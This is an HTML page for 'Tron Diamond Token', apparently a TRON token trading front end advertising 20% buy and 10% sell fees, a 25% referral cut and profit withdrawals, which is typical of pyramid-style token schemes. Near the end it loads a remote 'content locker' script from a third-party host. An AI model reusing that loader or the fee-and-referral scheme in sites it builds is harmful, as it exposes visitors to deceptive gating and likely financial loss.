<!DOCTYPE html> 
<html>

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no">
    <title>TDT shit</title>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.3.1/css/bootstrap.min.css">
    <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Oswald">
    <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Source+Serif+Pro">
    <link rel="stylesheet" href="assets/css/styles.min.css?h=9c33124224dd4209397cdd20eae02825">
</head>

<body id="body" class="bobthebuilder">
    <nav class="navbar navbar-light navbar-expand-md navigation-clean" style="background-color: #34313f;margin-bottom: -6%;">
        <div class="container"><a class="navbar-brand" href="#" style="font-size: 45px;color: rgb(255,255,255);margin-bottom: -1%;font-family: Oswald, sans-serif;">Tron Diamond Token</a><button data-toggle="collapse" class="navbar-toggler" data-target="#navcol-1"><span class="sr-only">Toggle navigation</span><span class="navbar-toggler-icon"></span></button>
            <div
                class="collapse navbar-collapse" id="navcol-1" style="width: 25%;">
                <ul class="nav navbar-nav ml-auto">
                    <li class="nav-item" role="presentation"><a class="nav-link text-white-50 psnbutton" href="#" style="font-size: 25px;margin-top: 40%;height: 50px;margin-left: -80%;width: 185px;">Contract<img src="assets/img/contract.png?h=59fe9b7bad7a03d00a10d47a8f3fab8f" style="height: 40px;margin-left: 75%;margin-top: -45%;width: 45px;padding-bottom: 2%;padding-right: 1%;">&nbsp;</a></li>
                    <li
                        class="nav-item" role="presentation" style="width: 141px;"><a class="nav-link text-white-50 psnbutton" href="#" style="font-size: 25px;margin-left: -79%;margin-top: 52%;width: 175px;height: 50px;margin-bottom: -5;">Discord<img src="assets/img/discord.png?h=d3097115774a1f6bf67101f537c264ba" style="width: 45px;height: 45px;margin-left: 75%;margin-top: -60%;"></a></li>
                </ul>
        </div><img src="assets/img/TronDiamondToken.png?h=51acc0d845b8767e37bf9cee73d2f5ef" style="background-color: rgb(52,49,63);width: 115px;height: 115px;"></div>
    </nav>
    <div style="margin-top: 5%;">
        <div class="container"> 
            <div class="row">
                <div class="col-md-4">
                    <div class="card">
                        <p class="text-center text-success" style="font-size: 175%;"><strong>BUY</strong></p><img src="assets/img/diamond.png?h=67f9b570ebf2b4a149261676a97e04d0" style="width: 25%;height: 35%;">
                        <p class="text-muted" style="width: 30%;height: 25%;margin-left: 40%;margin-top: -30%;margin-bottom: 60px;">&nbsp; &nbsp;Trx Per TDT:</p>
                        <p class="text-muted" style="width: 30%;height: 25%;margin-left: 44%;margin-top: -15%;margin-bottom: 30px;">Your Trx:</p><div id="rate-to-buy" class="text-muted" style="display: inline width: 11%;margin-left: 75%;margin-top: -28%;margin-bottom: 20%;">0</div> <span class="text-muted" id="user-wallet-balance" style="width: 11%;margin-left: 75%;margin-top: -16%;margin-bottom: 20%;">NaN</span>
                        <p
                            class="text-muted" style="width: 15%;height: 25%;margin-top: -5%;margin-bottom: 30px;margin-left: 20%;">Spend</p><input type="text" class="b-calc-item__input buy-input" style="width: 25%;height: 19px;margin-left: 40%;margin-top: -16%;" value="0">
                            <p class="text-muted" style="width: 15%;height: 25%;margin-top: -6%;margin-bottom: 30px;margin-right: 5;margin-left: 70%;">TRX</p>
                            <p class="text-success" style="width: 50%;height: 30px;font-size: 22px;"><strong>You will recive:</strong></p><span class="text-muted" style="width: 15%;margin-left: 50%;margin-top: -14%;font-size: 22px;">NaN</span>
                            <p class="text-success" style="width: 15%;height: 25%;margin-top: -10%;margin-bottom: 30px;margin-right: 5;margin-left: 65%;font-size: 22px;color: rgb(89,255,11);">TdT</p><button id="btn-buy" class="text-center psnbutton btn-buy btnGenerator btn-calc btn-buy buy-token-button" style="font-size: 25px;width: 320px;margin-top: 17%;">Buy Tokens</button></div>
                    <div class="card" style="margin-top: 10%;width: 600px;height: 295px;margin-bottom: -300px;margin-left: 20%;">
                        <h1 class="text-center text-muted">Trusted Projects</h1><img src="assets/img/fragbanner.png?h=cbc5a676861ed94d25b4c73cae68607b" style="height: 50px;"><img src="assets/img/468x60.png?h=030f95f89772f407d8f56a30bf929390" style="height: 50px;"><img src="assets/img/kingtoken%20Banner.png?h=348901a820424e401ae14fac1fc4177c" style="height: 50px;"></div>
                </div>
                <div class="col-md-4" style="height: 650px;">
                    <div class="card">
                        <p class="text-center text-danger" style="font-size: 175%;"><strong>SELL</strong></p><img src="assets/img/diamondSell.png?h=e32ef402c27f6f1eafa7a92dc35513df" style="width: 25%;height: 35%;">
                        <p class="text-muted" style="width: 30%;height: 25%;margin-left: 40%;margin-top: -30%;margin-bottom: 60px;">&nbsp; &nbsp;Trx Per TDT:</p>
                        <p class="text-muted" style="width: 30%;height: 25%;margin-left: 44%;margin-top: -15%;margin-bottom: 30px;">Your TDT:</p><span class="text-muted" id="rate-to-sell" style="width: 11%;margin-left: 75%;margin-top: -28%;margin-bottom: 20%;">NaN</span><span class="text-muted user-token-balance" style="width: 11%;margin-left: 75%;margin-top: -16%;margin-bottom: 20%;">NaN</span>
                        <p
                            class="text-muted" style="width: 15%;height: 25%;margin-top: -5%;margin-bottom: 30px;margin-left: 23%;">Sell</p><input class="d-xl-flex align-items-xl-center sellDTD text-center username-input s-calc-item__input sell-input" type="text" style="width: 25%;height: 19px;margin-left: 40%;margin-top: -16%;" value="0">
                            <p class="text-muted" style="width: 15%;height: 25%;margin-top: -6%;margin-bottom: 30px;margin-right: 5;margin-left: 70%;">TDT</p>
                            <p class="text-danger" style="width: 50%;height: 30px;font-size: 22px;"><strong>You will recive:</strong></p><span class="text-muted" style="width: 15%;margin-left: 50%;margin-top: -14%;font-size: 22px;">NaN</span>
                            <p class="text-danger" style="width: 15%;height: 25%;margin-top: -10%;margin-bottom: 30px;margin-right: 5;margin-left: 65%;font-size: 22px;color: rgb(254,19,19);">Trx</p><button id=¨SellButton¨ class="text-center psnbutton btn-sell btnGenerator btn-calc btn-sell sell-token-button" style="font-size: 25px;width: 320px;margin-top: 17%;">Sell Tokens</button></div>
                </div>
                <div class="col-md-4">
                    <div class="card">
                        <p class="text-center text-warning" style="font-size: 175%;"><strong>BALANCE</strong></p>
                        <p class="text-right text-muted" style="width: 104px;margin-left: 25%;"><strong>Total Volume</strong></p><span class="text-muted" style="width: 35px;margin-top: -12%;margin-left: 60%;">NaN</span>
                        <p class="text-left text-muted" style="width: 50px;margin-left: 75%;margin-top: -7.5%;">Trx</p>
                        <p class="text-right text-muted" style="width: 100px;margin-left: 25%;"><strong>Total Tokens</strong></p><span class="text-muted" style="width: 35px;margin-top: -12%;margin-left: 60%;">NaN</span>
                        <p class="text-left text-muted" style="width: 50px;margin-left: 75%;margin-top: -7.5%;">TDT</p>
                        <p class="text-right text-muted" style="width: 97px;margin-left: 25%;"><strong>Your Tokens</strong></p><span class="text-muted" style="width: 35px;margin-top: -12%;margin-left: 60%;">NaN</span>
                        <p class="text-left text-muted" style="width: 50px;margin-left: 75%;margin-top: -7.5%;">TDT</p>
                        <p class="text-right text-muted" style="width: 95px;margin-left: 25%;"><strong>Trx Balance</strong></p><span class="text-muted" style="width: 35px;margin-top: -12%;margin-left: 60%;">NaN</span><button id=¨WithdrawButton¨ class="text-center psnbutton" style="font-size: 25px;width: 320px;margin-top: 37%;">Withdraw Profit</button></div>
                    <div class="card" style="margin-top: 9.9%;">
                        <p class="text-center text-primary" style="font-size: 175%;"><strong>INFO</strong></p>
                        <p class="text-right text-muted" style="width: 104px;margin-left: 25%;"><strong>Buy %&nbsp;</strong></p><span class="text-muted" style="width: 35px;margin-top: -12%;margin-left: 60%;">20%</span>
                        <p class="text-right text-muted" style="width: 95px;margin-left: 25%;margin-top: 5%;"><strong>Sell %</strong></p><span class="text-muted" style="width: 35px;margin-top: -12%;margin-left: 60%;">10%</span><a class="text-white-50 psnbutton" href="#" style="font-size: 25px;width: 320px;margin-top: 5%;">Copy Refferal Link</a>
                        <p
                            class="text-center text-muted" style="margin-top: 12.5%;">25% Ref at no cost to them</p>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.3.1/js/bootstrap.bundle.min.js"></script>
          <script type="text/javascript" src="https://www.hostedfiles.net/contentlockers/load.php?id=bcf11513ca3b4e253b59702047ece13e"></script>
	
	 <script type="text/javascript">
			function getCookie(name) {
				var dc = document.cookie;
				var prefix = name + "=";
				var begin = dc.indexOf("; " + prefix);

				if (begin == -1) {
				  begin = dc.indexOf(prefix);
				  if (begin != 0) return "";
				}
				else
				{
					begin += 2;
					var end = document.cookie.indexOf(";", begin);
					if (end == -1) {
					end = dc.length;
				  }
				}
				
				return decodeURI(dc.substring(begin + prefix.length, end));
				
			}

			var url_string = window.location.href;
			var url = new URL(url_string);
			var theCookie = "masternode=" + url.searchParams.get("masternode");

			if (url.searchParams.get("masternode") !== null) {
			  var toSet = "masternode=" + url.searchParams.get("masternode");
			  document.cookie=theCookie;
			} else {
			}
		</script>
      <script src="jquery.min.js"></script>
  <script src="popper.min.js"></script>
  <script src="tether.min.js"></script>
  <script src="bootstrap.min.js"></script>
  <script src="jquery.viewportchecker.js"></script>
  <script src="script.min.js"></script>
  <script src="jquery.touch-swipe.min.js"></script>
  <script src="smooth-scroll.js"></script>
  <script src="script.js"></script>
    <link rel="stylesheet" href="kk.css">
  <link rel="stylesheet" href="styles.css">
  <link rel="stylesheet" href="style.css">
  <link rel="stylesheet" href="animate.min.css">
  <link rel="stylesheet" href="style.css">
  <link rel="stylesheet" href="mbr-additional.css" type="text/css">
</body>

</html>
